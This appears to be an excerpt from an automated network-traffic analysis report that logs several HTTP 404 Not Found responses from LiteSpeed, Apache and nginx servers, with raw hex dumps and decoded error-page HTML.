                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 07 Nov 2024 16:58:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 07 Nov 2024 16:58:33 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 
00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 07 Nov 2024 16:58:36 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 37 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 
3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:44 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:47 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 07 Nov 2024 16:58:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:58:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 07 Nov 2024 16:58:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
